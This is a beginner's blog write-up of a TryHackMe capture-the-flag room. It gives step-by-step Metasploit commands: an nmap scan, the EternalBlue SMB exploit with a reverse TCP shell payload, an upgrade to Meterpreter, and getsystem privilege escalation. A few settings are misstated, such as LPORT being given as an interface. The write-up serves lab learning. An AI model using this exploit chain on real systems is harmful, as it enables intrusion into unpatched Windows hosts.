TryHackMe CTF Writeup
TryHackMe
Hello Guys !
This is my first write-up ignore any silly mistakes lol.😌
Source: TryHackMe
Room: Lazyblue with IP
Difficulty: Easy
This room is made for beginner level hackers, however anyone can try and hack into this box.
Anyways, lets jump into action !
Reconnaissance:
First step in almost every box, running an nmap scan.
Command: nmap -sC -sV -A (ip) -oN lazy.log
nmap: tool to scan ip's ports
-A is used for Aggressive scan
-oN is use here to save the info in lazy.log (you can see after enumeration by command: cat lazy.log)
Gain Access:
NOW, OPEN METASPLOIT (command: msfconsole -q)
then, search eternalblue
then, use 2
or, use exploit/windows/smb/ms17_010_eternalblue
then, set RHOSTS (host ip)
then, set PAYLOAD windows/x64/shell/reverse_tcp
then, show options - to see all the requirements are satisfied or not
then, set LPORT tun0 (openvpn by tryhackme)
then, command: exploit, run, or run -j
Now you could see that our exploit has been executed and we got the windows host shell. But in order to continue we need the Meterpreter shell to execute linux commands and to upload files.
Escalate:
Background the host session with command: background or press ctrl+z (in linux) and command+z (in mac) and use shell_to_meterpreter
then, search meterpreter
then, use 202, or use post/multi/manage/shell_to_meterpreter
then, show options and check if any requirement not satisfied then provide it
set SESSION 1 (you can check the running session with command: sessions)
then, exploit
(If it runned and intercept successful then Ok, otherwise change LPORT to 1234)
then, check the new session is started by command: sessions
Now, run sessions 2
Cracking:
Now, check some info of system
by, sysinfo, and check the system is in NT AUTHORITY\SYSTEM or not by: getsystem
If you didn't get then run shell (to run back to shell) and run here systeminfo then check and back to meterpreter by ctrl+z
Find Flag:
Everything is done, from here you need to find the flag by yourself
Comments
Post a Comment